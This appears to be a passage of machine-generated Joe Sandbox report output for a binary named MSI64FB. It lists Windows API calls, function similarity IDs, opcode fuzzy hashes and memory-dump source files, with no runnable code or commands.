                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
                                                                                                                                                                                                                                                    • Instruction ID: f1e0ec8c27c273e7964a06451ea3a4a8ed4a77eabebbf1c35d105c8bad57fa86
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4911E132A1C256C6E764BF66A0401B9B2B0EB81B60FD48136DB29473C4DE38E8858B10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF749F986E0,00000000,00000092,?,?,00000000,?,?,00007FF749F8D493), ref: 00007FF749F98066
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
                                                                                                                                                                                                                                                    • Instruction ID: a1b8f899fbcd748f004afe648dd458e55b89d5350c82746a86503cbd22a424f6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4301B162F0C281C6E7107F16E4407B9B6B1EB41BA4FC59231D629472E5CF6D9480CB10
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                                                                                    • Opcode ID: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
                                                                                                                                                                                                                                                    • Instruction ID: abc0d672e6fee2773fa971c31a9a8ad78acb594a531c14d58b0d93e64db3c199
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F05836E3D842C2E7AABE1D9859B7892B0EF84308FD00976F50B826D8CF5CE440C761
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF749F9132C,?,?,?,?,?,?,?,?,00000000,00007FF749F9753C), ref: 00007FF749F90F1A
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                                                                                                                    • Opcode ID: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
                                                                                                                                                                                                                                                    • Instruction ID: dad6a2e4c83d6cf8e67ce6342b8e159bf9f701354bc061065d00ba03c55840fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CBF0D432B18A45C2E700FF16E894769A3B5EB98B80FA88035D659473A5CF3CD8A4C750
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                                    • API String ID: 0-1523873471
                                                                                                                                                                                                                                                    • Opcode ID: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
                                                                                                                                                                                                                                                    • Instruction ID: e7f9c7e16b89adc199ebd8ad564456a43e3fab88c7541b1eb7cec7c42705158e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8BA14462B2C7C68AEB61EF25A4007AAFBA0AB54B84F448032DE8D577C5DB3DE401C751
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00007FF749F93835
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F90E30: HeapAlloc.KERNEL32(?,?,00000000,00007FF749F8EA4F), ref: 00007FF749F90E85
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: HeapFree.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5D6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F8E5C0: GetLastError.KERNEL32(?,?,?,00007FF749F96936,?,?,?,00007FF749F96CB3,?,?,00000000,00007FF749F97239,?,?,?,00007FF749F9716B), ref: 00007FF749F8E5E0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F9A690: _invalid_parameter_noinfo.LIBCMT ref: 00007FF749F9A6C3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 916656526-0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77E4C: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F42267,?,?,?,00007FF749F437E1), ref: 00007FF749F77E5C
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,?,?,00007FF749F437E1), ref: 00007FF749F42216
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77DE0: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F422CC,?,?,?,00007FF749F437E1), ref: 00007FF749F77DF0
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F77DE0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000004,00007FF749F422CC,?,?,?,00007FF749F437E1), ref: 00007FF749F77E30
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$Acquire$HeapProcessRelease
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3865638231-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 443252259-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: LockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3382485803-0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4003095782-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
                                                                                                                                                                                                                                                    • Instruction ID: e162665fda8c6a159a8cb9b6abc42718cfde08eda35d7a4c4bc904b0d0cb4274
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2191CE22B1EA96D9FB10BF69C4501BCA7B1AB44B98B954031DE0E07BD5EF28D991C320
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
                                                                                                                                                                                                                                                    • Instruction ID: d5ddc76d78f951f711d10ed4fa1dfe612a76f81a989a4f12dea66c7722e4e71b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C191F022F0C681E9FB05BF6994502BCABB1AB01BA8FA64035CE5E177D6DE68D545C320
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
                                                                                                                                                                                                                                                    • Instruction ID: 03bd2c467624a531bf50bff0cc9f7914b4ee1817718e1ebef62f48ce047cf3f7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4191D222D1CF85C4E766BE68A4403BBE271BF86750F649331DE6D265E5DF3CA0818610
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
                                                                                                                                                                                                                                                    • Instruction ID: 28892ccfc50cb449153a08de45562bd8af57b26b78073fb71f739bc50a4abf65
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 958af43b5455bf2407519b3ecd724e91f302b1c621c373eda0090ceb08c00e34
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1518336A6CA51C6E724AF29C450238B3B0EB48B68F648171EE4D177D5CB3AEC53C750
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
                                                                                                                                                                                                                                                    • Instruction ID: 358f16d29d8e2efbd38dfb3445678240bf58a21423d506ed8115466442e903db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6ae896f4f730ecb132dcea19f42c89ba9b02889226b951f8076e892e6296241
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0451B132A5C652C6E764AF2DC050238B7B1EB48B58FA44171EE4C077E4CB3AE943C760
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
                                                                                                                                                                                                                                                    • Instruction ID: d8ed084c6a60ae3d947aa64ad6ce35cfb9c6214ad9d0ff60e567b834d565e8e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9cd13e66553fd8c4517fa76dc8a4af09b0066961e128d371c74e405cdbe00d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2519F32A6C651C6E764AF29C044238B7B0EB49B58FA84171EE4D177E4CB3AEC42C760
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
                                                                                                                                                                                                                                                    • Instruction ID: 5b0b545c114e3ff73cd01510325725535370ea9a49d7a9f8db4a4fabf3f06737
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e081bc5d7bfd2ee68d489027360a41bc3b7ef8b2fb9564c51f1fe64475db137d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51A036A6C651C6E764AF29C140238B7B0EB48B58FA84171EE4D177E4CB3AEC53C790
Memory Dump Source
• Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
                                                                                                                                                                                                                                                    • Opcode ID: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
                                                                                                                                                                                                                                                    • Instruction ID: 61b11fa3e67249b50176e07ef2f67bb30803ac3f969353088283038b504356f2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c354f88c1c44c2ece779ca759ea73176f561d08044f83dab54d900259ffb089
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1141C462718A5582EF44EF6AD91517AE3B1BB48FD4B89A032EE1D97B94EF3CD4418300
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary$ErrorLast$AddressLoadLocalProc
                                                                                                                                                                                                                                                    • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                                                                                                                                                                                                                    • API String ID: 541295828-1129428314
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn$File$DeleteMoveNameTemp
                                                                                                                                                                                                                                                    • String ID: URL$url
                                                                                                                                                                                                                                                    • API String ID: 3276202954-346267919
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: \\?\$\\?\UNC\
                                                                                                                                                                                                                                                    • API String ID: 195334829-3019864461
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: 0$0$0$0$0
                                                                                                                                                                                                                                                    • API String ID: 3215553584-4235325143
                                                                                                                                                                                                                                                    • Opcode ID: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
                                                                                                                                                                                                                                                    • Instruction ID: 332157af02da3a74ecb35d90f87d810c975de49603aca3f151f016b4c807f95e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b24385261a155569ef5ab7d3b3c7fbfe2ef6433bdc03180ed18f33fce35c48fd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06E1E43290DE86C5E791FE2A84503BDEBB1AB91B44FE48032DA9C577C2CF3DA4558321
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
• Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: msi
                                                                                                                                                                                                                                                    APIs
